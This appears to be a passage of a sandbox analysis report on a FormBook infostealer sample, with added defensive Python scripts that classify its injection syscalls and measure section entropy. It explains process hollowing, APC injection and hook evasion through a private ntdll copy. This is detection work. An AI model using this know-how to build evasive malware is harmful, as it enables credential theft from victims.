Source: 00000000.00000002.409203550.000000000397B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000000.00000002.409203550.000000000397B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000007.00000000.463881212.000000000D63F000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000007.00000000.463881212.000000000D63F000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000007.00000000.463881212.000000000D63F000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000007.00000000.484050905.000000000D63F000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000007.00000000.484050905.000000000D63F000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000007.00000000.484050905.000000000D63F000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000000D.00000002.631975004.0000000002CD0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 0000000D.00000002.631975004.0000000002CD0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000000D.00000002.631975004.0000000002CD0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000000D.00000002.631553136.0000000000B90000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 0000000D.00000002.631553136.0000000000B90000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000000D.00000002.631553136.0000000000B90000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: Process Memory Space: vbc.exe PID: 6088, type: MEMORYSTR Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: Process Memory Space: vbc.exe PID: 5776, type: MEMORYSTR Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: Process Memory Space: control.exe PID: 1272, type: MEMORYSTR Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: C:\Users\user\Desktop\vbc.exe Code function: 0_2_0265CD04 0_2_0265CD04
Source: C:\Users\user\Desktop\vbc.exe Code function: 0_2_0265F0D0 0_2_0265F0D0
Source: C:\Users\user\Desktop\vbc.exe Code function: 0_2_053741D0 0_2_053741D0
Source: C:\Users\user\Desktop\vbc.exe Code function: 0_2_07095DF0 0_2_07095DF0
Source: C:\Users\user\Desktop\vbc.exe Code function: 0_2_070955B8 0_2_070955B8
Source: C:\Users\user\Desktop\vbc.exe Code function: 0_2_070955C8 0_2_070955C8
Source: C:\Users\user\Desktop\vbc.exe Code function: 0_2_07096343 0_2_07096343
Source: C:\Users\user\Desktop\vbc.exe Code function: 0_2_07096FC8 0_2_07096FC8
Source: C:\Users\user\Desktop\vbc.exe Code function: 0_2_07095DE1 0_2_07095DE1
Source: C:\Users\user\Desktop\vbc.exe Code function: 6_2_015BF900 6_2_015BF900
Source: C:\Users\user\Desktop\vbc.exe Code function: 6_2_015D4120 6_2_015D4120
Source: C:\Users\user\Desktop\vbc.exe Code function: 6_2_015D99BF 6_2_015D99BF
Source: C:\Users\user\Desktop\vbc.exe Code function: 6_2_0168E824 6_2_0168E824
Source: C:\Users\user\Desktop\vbc.exe Code function: 6_2_01671002 6_2_01671002
Source: C:\Users\user\Desktop\vbc.exe Code function: 6_2_015DA830 6_2_015DA830
Source: C:\Users\user\Desktop\vbc.exe Code function: 6_2_016828EC 6_2_016828EC
Source: C:\Users\user\Desktop\vbc.exe Code function: 6_2_016820A8 6_2_016820A8
Source: C:\Users\user\Desktop\vbc.exe Code function: 6_2_015CB090 6_2_015CB090
Source: C:\Users\user\Desktop\vbc.exe Code function: 6_2_015E20A0 6_2_015E20A0
Source: C:\Users\user\Desktop\vbc.exe Code function: 6_2_015DAB40 6_2_015DAB40
Source: C:\Users\user\Desktop\vbc.exe Code function: 6_2_01682B28 6_2_01682B28
Source: C:\Users\user\Desktop\vbc.exe Code function: 6_2_015DA309 6_2_015DA309
Source: C:\Users\user\Desktop\vbc.exe Code function: 6_2_016623E3 6_2_016623E3
Source: C:\Users\user\Desktop\vbc.exe Code function: 6_2_015EABD8 6_2_015EABD8
Source: C:\Users\user\Desktop\vbc.exe Code function: 6_2_0167DBD2 6_2_0167DBD2
Source: C:\Users\user\Desktop\vbc.exe Code function: 6_2_016703DA 6_2_016703DA
Source: C:\Users\user\Desktop\vbc.exe Code function: 6_2_015EEBB0 6_2_015EEBB0
Source: C:\Users\user\Desktop\vbc.exe Code function: 6_2_0166FA2B 6_2_0166FA2B
Source: C:\Users\user\Desktop\vbc.exe Code function: 6_2_01674AEF 6_2_01674AEF
Source: C:\Users\user\Desktop\vbc.exe Code function: 6_2_016822AE 6_2_016822AE
Source: C:\Users\user\Desktop\vbc.exe Code function: 6_2_01681D55 6_2_01681D55
Source: C:\Users\user\Desktop\vbc.exe Code function: 6_2_01682D07 6_2_01682D07
Source: C:\Users\user\Desktop\vbc.exe Code function: 6_2_015B0D20 6_2_015B0D20
Source: C:\Users\user\Desktop\vbc.exe Code function: 6_2_016825DD 6_2_016825DD
Source: C:\Users\user\Desktop\vbc.exe Code function: 6_2_015CD5E0 6_2_015CD5E0
Source: C:\Users\user\Desktop\vbc.exe Code function: 6_2_015E2581 6_2_015E2581
Source: C:\Users\user\Desktop\vbc.exe Code function: 6_2_01672D82 6_2_01672D82
Source: C:\Users\user\Desktop\vbc.exe Code function: 6_2_0167D466 6_2_0167D466
Source: C:\Users\user\Desktop\vbc.exe Code function: 6_2_015C841F 6_2_015C841F
Source: C:\Users\user\Desktop\vbc.exe Code function: 6_2_01674496 6_2_01674496
Source: C:\Users\user\Desktop\vbc.exe Code function: 6_2_01681FF1 6_2_01681FF1
Source: C:\Users\user\Desktop\vbc.exe Code function: 6_2_0168DFCE 6_2_0168DFCE
Source: C:\Users\user\Desktop\vbc.exe Code function: 6_2_015D6E30 6_2_015D6E30
Source: C:\Users\user\Desktop\vbc.exe Code function: 6_2_0167D616 6_2_0167D616
Source: C:\Users\user\Desktop\vbc.exe Code function: 6_2_01682EF7 6_2_01682EF7
Source: C:\Users\user\Desktop\vbc.exe Code function: String function: 015BB150 appears 133 times
Source: C:\Users\user\Desktop\vbc.exe Code function: 6_2_015F9910 NtAdjustPrivilegesToken,LdrInitializeThunk, 6_2_015F9910
Source: C:\Users\user\Desktop\vbc.exe Code function: 6_2_015F99A0 NtCreateSection,LdrInitializeThunk, 6_2_015F99A0
Source: C:\Users\user\Desktop\vbc.exe Code function: 6_2_015F9840 NtDelayExecution,LdrInitializeThunk, 6_2_015F9840
Source: C:\Users\user\Desktop\vbc.exe Code function: 6_2_015F9860 NtQuerySystemInformation,LdrInitializeThunk, 6_2_015F9860
Source: C:\Users\user\Desktop\vbc.exe Code function: 6_2_015F98F0 NtReadVirtualMemory,LdrInitializeThunk, 6_2_015F98F0
Source: C:\Users\user\Desktop\vbc.exe Code function: 6_2_015F9A50 NtCreateFile,LdrInitializeThunk, 6_2_015F9A50
Source: C:\Users\user\Desktop\vbc.exe Code function: 6_2_015F9A00 NtProtectVirtualMemory,LdrInitializeThunk, 6_2_015F9A00
Source: C:\Users\user\Desktop\vbc.exe Code function: 6_2_015F9A20 NtResumeThread,LdrInitializeThunk, 6_2_015F9A20
Source: C:\Users\user\Desktop\vbc.exe Code function: 6_2_015F9540 NtReadFile,LdrInitializeThunk, 6_2_015F9540
Source: C:\Users\user\Desktop\vbc.exe Code function: 6_2_015F95D0 NtClose,LdrInitializeThunk, 6_2_015F95D0
Source: C:\Users\user\Desktop\vbc.exe Code function: 6_2_015F9710 NtQueryInformationToken,LdrInitializeThunk, 6_2_015F9710
Source: C:\Users\user\Desktop\vbc.exe Code function: 6_2_015F9FE0 NtCreateMutant,LdrInitializeThunk, 6_2_015F9FE0
Source: C:\Users\user\Desktop\vbc.exe Code function: 6_2_015F9780 NtMapViewOfSection,LdrInitializeThunk, 6_2_015F9780
Source: C:\Users\user\Desktop\vbc.exe Code function: 6_2_015F97A0 NtUnmapViewOfSection,LdrInitializeThunk, 6_2_015F97A0
Source: C:\Users\user\Desktop\vbc.exe Code function: 6_2_015F9660 NtAllocateVirtualMemory,LdrInitializeThunk, 6_2_015F9660
Source: C:\Users\user\Desktop\vbc.exe Code function: 6_2_015F96E0 NtFreeVirtualMemory,LdrInitializeThunk, 6_2_015F96E0
Source: C:\Users\user\Desktop\vbc.exe Code function: 6_2_015F9950 NtQueueApcThread, 6_2_015F9950
Source: C:\Users\user\Desktop\vbc.exe Code function: 6_2_015F99D0 NtCreateProcessEx, 6_2_015F99D0
Source: C:\Users\user\Desktop\vbc.exe Code function: 6_2_015FB040 NtSuspendThread, 6_2_015FB040
Source: C:\Users\user\Desktop\vbc.exe Code function: 6_2_015F9820 NtEnumerateKey, 6_2_015F9820
Source: C:\Users\user\Desktop\vbc.exe Code function: 6_2_015F98A0 NtWriteVirtualMemory, 6_2_015F98A0
Source: C:\Users\user\Desktop\vbc.exe Code function: 6_2_015F9B00 NtSetValueKey, 6_2_015F9B00
Source: C:\Users\user\Desktop\vbc.exe Code function: 6_2_015FA3B0 NtGetContextThread, 6_2_015FA3B0
Source: C:\Users\user\Desktop\vbc.exe Code function: 6_2_015F9A10 NtQuerySection, 6_2_015F9A10
Source: C:\Users\user\Desktop\vbc.exe Code function: 6_2_015F9A80 NtOpenDirectoryObject, 6_2_015F9A80
Source: C:\Users\user\Desktop\vbc.exe Code function: 6_2_015F9560 NtWriteFile, 6_2_015F9560
Source: C:\Users\user\Desktop\vbc.exe Code function: 6_2_015FAD30 NtSetContextThread, 6_2_015FAD30
Source: C:\Users\user\Desktop\vbc.exe Code function: 6_2_015F9520 NtWaitForSingleObject, 6_2_015F9520
Source: C:\Users\user\Desktop\vbc.exe Code function: 6_2_015F95F0 NtQueryInformationFile, 6_2_015F95F0
Source: C:\Users\user\Desktop\vbc.exe Code function: 6_2_015FA770 NtOpenThread, 6_2_015FA770
Source: C:\Users\user\Desktop\vbc.exe Code function: 6_2_015F9770 NtSetInformationFile, 6_2_015F9770
Source: C:\Users\user\Desktop\vbc.exe Code function: 6_2_015F9760 NtOpenProcess, 6_2_015F9760
Source: C:\Users\user\Desktop\vbc.exe Code function: 6_2_015FA710 NtOpenProcessToken, 6_2_015FA710
Source: C:\Users\user\Desktop\vbc.exe Code function: 6_2_015F9730 NtQueryVirtualMemory, 6_2_015F9730
Source: C:\Users\user\Desktop\vbc.exe Code function: 6_2_015F9650 NtQueryValueKey, 6_2_015F9650
Source: C:\Users\user\Desktop\vbc.exe Code function: 6_2_015F9670 NtQueryInformationProcess, 6_2_015F9670
Source: C:\Users\user\Desktop\vbc.exe Code function: 6_2_015F9610 NtEnumerateValueKey, 6_2_015F9610
Source: C:\Users\user\Desktop\vbc.exe Code function: 6_2_015F96D0 NtCreateKey, 6_2_015F96D0
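Two things stand out in the native-API list above. First, every stub sits at 0x015F9520 to 0x015FB040 in process 6, inside the region at 0x01590000 that the PDB-string entries later in this report attribute to a copy of ntdll (wntdll.pdb), not inside the loaded ntdll image; that is consistent with the sample calling a privately mapped ntdll copy so that user-mode hooks on the real one never see these calls. Second, the resolved names cover the full primitive set of process hollowing (NtUnmapViewOfSection, NtAllocateVirtualMemory, NtWriteVirtualMemory, NtGetContextThread, NtSetContextThread, NtResumeThread), of section mapping into another process (NtCreateSection, NtMapViewOfSection, NtOpenProcess) and of APC-based thread injection (NtOpenThread, NtQueueApcThread). The added example below (not part of the report) parses a subset of these entries, checks the stub addresses against that dump base and reports which technique's primitive set is complete. The technique-to-syscall map is the usual textbook grouping and is this script's assumption, and the 0x200000 region size is an assumption as well, because the report gives no dump size.

```python
import re

# Input: a subset of this report's "Code function" entries for process 6,
# copied as the report prints them (the full list is longer; this is enough to run).
REPORT_LINES = r"""
Source: C:\Users\user\Desktop\vbc.exe Code function: 6_2_015F9910 NtAdjustPrivilegesToken,LdrInitializeThunk, 6_2_015F9910
Source: C:\Users\user\Desktop\vbc.exe Code function: 6_2_015F99A0 NtCreateSection,LdrInitializeThunk, 6_2_015F99A0
Source: C:\Users\user\Desktop\vbc.exe Code function: 6_2_015F9840 NtDelayExecution,LdrInitializeThunk, 6_2_015F9840
Source: C:\Users\user\Desktop\vbc.exe Code function: 6_2_015F9A00 NtProtectVirtualMemory,LdrInitializeThunk, 6_2_015F9A00
Source: C:\Users\user\Desktop\vbc.exe Code function: 6_2_015F9A20 NtResumeThread,LdrInitializeThunk, 6_2_015F9A20
Source: C:\Users\user\Desktop\vbc.exe Code function: 6_2_015F95D0 NtClose,LdrInitializeThunk, 6_2_015F95D0
Source: C:\Users\user\Desktop\vbc.exe Code function: 6_2_015F9780 NtMapViewOfSection,LdrInitializeThunk, 6_2_015F9780
Source: C:\Users\user\Desktop\vbc.exe Code function: 6_2_015F97A0 NtUnmapViewOfSection,LdrInitializeThunk, 6_2_015F97A0
Source: C:\Users\user\Desktop\vbc.exe Code function: 6_2_015F9660 NtAllocateVirtualMemory,LdrInitializeThunk, 6_2_015F9660
Source: C:\Users\user\Desktop\vbc.exe Code function: 6_2_015F9950 NtQueueApcThread, 6_2_015F9950
Source: C:\Users\user\Desktop\vbc.exe Code function: 6_2_015F99D0 NtCreateProcessEx, 6_2_015F99D0
Source: C:\Users\user\Desktop\vbc.exe Code function: 6_2_015FB040 NtSuspendThread, 6_2_015FB040
Source: C:\Users\user\Desktop\vbc.exe Code function: 6_2_015F98A0 NtWriteVirtualMemory, 6_2_015F98A0
Source: C:\Users\user\Desktop\vbc.exe Code function: 6_2_015FA3B0 NtGetContextThread, 6_2_015FA3B0
Source: C:\Users\user\Desktop\vbc.exe Code function: 6_2_015FAD30 NtSetContextThread, 6_2_015FAD30
Source: C:\Users\user\Desktop\vbc.exe Code function: 6_2_015F9520 NtWaitForSingleObject, 6_2_015F9520
Source: C:\Users\user\Desktop\vbc.exe Code function: 6_2_015FA770 NtOpenThread, 6_2_015FA770
Source: C:\Users\user\Desktop\vbc.exe Code function: 6_2_015F9760 NtOpenProcess, 6_2_015F9760
Source: C:\Users\user\Desktop\vbc.exe Code function: 6_2_015F9670 NtQueryInformationProcess, 6_2_015F9670
""".strip().splitlines()

# "<proc>_<phase>_<addr> <call1>,<call2>,"  ->  address of the stub and the names it calls
ENTRY_RE = re.compile(r"Code function: \d+_\d+_(?P<addr>[0-9A-Fa-f]{8}) (?P<calls>\S+)")
NT_NAME_RE = re.compile(r"\bNt[A-Z]\w*")

# Assumption: the conventional primitive sets for each injection technique.
TECHNIQUES = {
    # hollow a suspended child: drop its image, write a new one, redirect the thread
    "process hollowing": {"NtUnmapViewOfSection", "NtAllocateVirtualMemory",
                          "NtWriteVirtualMemory", "NtGetContextThread",
                          "NtSetContextThread", "NtResumeThread"},
    # map a section view into a foreign process instead of writing into it
    "section mapping injection": {"NtCreateSection", "NtMapViewOfSection", "NtOpenProcess"},
    # start execution in a foreign thread via a user-mode APC
    "APC injection": {"NtOpenThread", "NtQueueApcThread"},
}


def native_stubs(lines):
    """Map each Nt* name the report saw to the address of the stub that calls it."""
    stubs = {}
    for line in lines:
        m = ENTRY_RE.search(line)
        if not m:
            continue
        for name in NT_NAME_RE.findall(m.group("calls")):
            stubs[name] = int(m.group("addr"), 16)
    return stubs


def stub_address_range(stubs):
    addrs = sorted(stubs.values())
    return (addrs[0], addrs[-1]) if addrs else None


def inside_region(stubs, base, size):
    """True when every stub lies in [base, base + size): the check against the dump
    whose start address the report prints next to the wntdll.pdb string."""
    return all(base <= a < base + size for a in stubs.values())


def classify(names):
    """For each technique: whether its full primitive set was resolved, and what is missing."""
    names = set(names)
    return {tech: {"complete": needed <= names, "missing": sorted(needed - names)}
            for tech, needed in TECHNIQUES.items()}


if __name__ == "__main__":
    stubs = native_stubs(REPORT_LINES)
    lo, hi = stub_address_range(stubs)
    print(f"{len(stubs)} stubs at {lo:#010x}..{hi:#010x}; "
          f"inside ntdll copy at 0x01590000: {inside_region(stubs, 0x01590000, 0x200000)}")
    for tech, verdict in classify(stubs).items():
        print(f"{tech:<28} complete={verdict['complete']} missing={verdict['missing']}")
```

For detection this means hooks in the real ntdll are not enough; kernel-side telemetry (ETW threat-intelligence events, or an EDR's kernel callbacks for NtMapViewOfSection and NtSetContextThread on a foreign process) still sees the calls regardless of which copy of ntdll issued them.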
Source: vbc.exe, 00000000.00000002.407071082.00000000028F3000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenameWebName.dll4 vs vbc.exe
Source: vbc.exe, 00000000.00000002.415770591.0000000006E80000.00000004.08000000.00040000.00000000.sdmp Binary or memory string: OriginalFilenameKeysNormalize.dll4 vs vbc.exe
Source: vbc.exe, 00000000.00000000.362679786.00000000004D2000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: OriginalFilenameSegm.exeB vs vbc.exe
Source: vbc.exe, 00000000.00000002.415918626.0000000006EC0000.00000004.08000000.00040000.00000000.sdmp Binary or memory string: OriginalFilenameWebName.dll4 vs vbc.exe
Source: vbc.exe, 00000000.00000002.409203550.000000000397B000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenameDoncepre.dll@ vs vbc.exe
Source: vbc.exe, 00000000.00000002.416361250.0000000007010000.00000004.08000000.00040000.00000000.sdmp Binary or memory string: OriginalFilenameDoncepre.dll@ vs vbc.exe
Source: vbc.exe, 00000006.00000003.407195484.0000000001513000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamentdll.dllj% vs vbc.exe
Source: vbc.exe, 00000006.00000003.404813945.0000000001373000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamentdll.dllj% vs vbc.exe
Source: vbc.exe, 00000006.00000002.500864587.00000000016AF000.00000040.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamentdll.dllj% vs vbc.exe
Source: vbc.exe Binary or memory string: OriginalFilenameSegm.exeB vs vbc.exe
Source: vbc.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: vbc.exe ReversingLabs: Detection: 31%
Source: vbc.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\vbc.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: unknown Process created: C:\Users\user\Desktop\vbc.exe "C:\Users\user\Desktop\vbc.exe"
Source: C:\Users\user\Desktop\vbc.exe Process created: C:\Users\user\Desktop\vbc.exe C:\Users\user\Desktop\vbc.exe
Source: C:\Users\user\Desktop\vbc.exe Process created: C:\Users\user\Desktop\vbc.exe C:\Users\user\Desktop\vbc.exe
Source: C:\Windows\explorer.exe Process created: C:\Windows\SysWOW64\control.exe C:\Windows\SysWOW64\control.exe
Source: C:\Users\user\Desktop\vbc.exe Process created: C:\Users\user\Desktop\vbc.exe C:\Users\user\Desktop\vbc.exe
Source: C:\Users\user\Desktop\vbc.exe Process created: C:\Users\user\Desktop\vbc.exe C:\Users\user\Desktop\vbc.exe
Source: C:\Windows\explorer.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{6C3EE638-B588-4D7D-B30A-E7E36759305D}\InprocServer32
Source: C:\Users\user\Desktop\vbc.exe File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\vbc.exe.log
Source: C:\Windows\SysWOW64\control.exe File created: C:\Users\user\AppData\Local\Temp\4-9E1JJI
Source: classification engine Classification label: mal100.troj.spyw.evad.winEXE@6/2@4/3
Source: vbc.exe Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
Source: C:\Users\user\Desktop\vbc.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
Source: vbc.exe, ProcExpGUI/Form1.cs Cryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
Source: 0.0.vbc.exe.4d0000.0.unpack, ProcExpGUI/Form1.cs Cryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
Source: C:\Windows\explorer.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Users\user\Desktop\vbc.exe File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
Source: C:\Windows\SysWOW64\control.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\
Source: vbc.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
Source: vbc.exe Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: Binary string: wntdll.pdbUGP source: vbc.exe, 00000006.00000003.406454999.00000000013F4000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000006.00000003.404197199.000000000125D000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000006.00000002.498700993.0000000001590000.00000040.00000800.00020000.00000000.sdmp, control.exe, 0000000D.00000003.497959345.0000000004ADC000.00000004.00000800.00020000.00000000.sdmp, control.exe, 0000000D.00000002.644322679.0000000004F2F000.00000040.00000800.00020000.00000000.sdmp, control.exe, 0000000D.00000003.500502722.0000000004C79000.00000004.00000800.00020000.00000000.sdmp, control.exe, 0000000D.00000002.642912671.0000000004E10000.00000040.00000800.00020000.00000000.sdmp
Source: Binary string: wntdll.pdb source: vbc.exe, vbc.exe, 00000006.00000003.406454999.00000000013F4000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000006.00000003.404197199.000000000125D000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000006.00000002.498700993.0000000001590000.00000040.00000800.00020000.00000000.sdmp, control.exe, 0000000D.00000003.497959345.0000000004ADC000.00000004.00000800.00020000.00000000.sdmp, control.exe, 0000000D.00000002.644322679.0000000004F2F000.00000040.00000800.00020000.00000000.sdmp, control.exe, 0000000D.00000003.500502722.0000000004C79000.00000004.00000800.00020000.00000000.sdmp, control.exe, 0000000D.00000002.642912671.0000000004E10000.00000040.00000800.00020000.00000000.sdmp

Data Obfuscation

Source: vbc.exe, ProcExpGUI/Form1.cs .Net Code: WaitHandle System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
Source: 0.0.vbc.exe.4d0000.0.unpack, ProcExpGUI/Form1.cs .Net Code: WaitHandle System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
Source: C:\Users\user\Desktop\vbc.exe Code function: 6_2_0160D0D1 push ecx; ret 6_2_0160D0E4
Source: initial sample Static PE information: section name: .text entropy: 7.777091407724558
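A .text entropy of 7.78 out of a possible 8.0 is high for a .NET executable: managed IL and metadata normally sit well below that, so the number points to a large encrypted or compressed blob stored in the section. That fits the CreateDecryptor/TransformFinalBlock usage and the AppDomain::Load(System.Byte[]) call reported above (decrypt an embedded assembly, then load it straight from memory), which is why the native FormBook payload only appears in the unpacked memory dumps. The added example below (not from the report) reproduces the measurement: it walks the PE section table with nothing beyond the standard library, computes Shannon entropy per section and flags sections above a threshold. The 7.0 cut-off is a common rule of thumb rather than a fixed standard, and the image the test builds is a constructed header-only fixture, not a real executable.

```python
import math
import struct
from collections import Counter

PACKED_THRESHOLD = 7.0  # assumption: usual rule of thumb for "packed or encrypted"; tune per corpus


def shannon_entropy(data: bytes) -> float:
    """Bits per byte, 0.0 (constant) to 8.0 (uniform): the measure the report prints."""
    if not data:
        return 0.0
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in Counter(data).values())


def pe_sections(image: bytes):
    """Yield (name, raw_bytes) straight from the PE section table, no third-party parser."""
    if image[:2] != b"MZ":
        raise ValueError("not an MZ image")
    e_lfanew = struct.unpack_from("<I", image, 0x3C)[0]
    if image[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("PE signature not found")
    coff = e_lfanew + 4                                     # IMAGE_FILE_HEADER
    num_sections = struct.unpack_from("<H", image, coff + 2)[0]
    opt_size = struct.unpack_from("<H", image, coff + 16)[0]
    table = coff + 20 + opt_size                            # first IMAGE_SECTION_HEADER
    for i in range(num_sections):
        hdr = table + 40 * i
        name = image[hdr:hdr + 8].rstrip(b"\0").decode("ascii", "replace")
        raw_size, raw_ptr = struct.unpack_from("<II", image, hdr + 16)   # SizeOfRawData, PointerToRawData
        yield name, image[raw_ptr:raw_ptr + raw_size]


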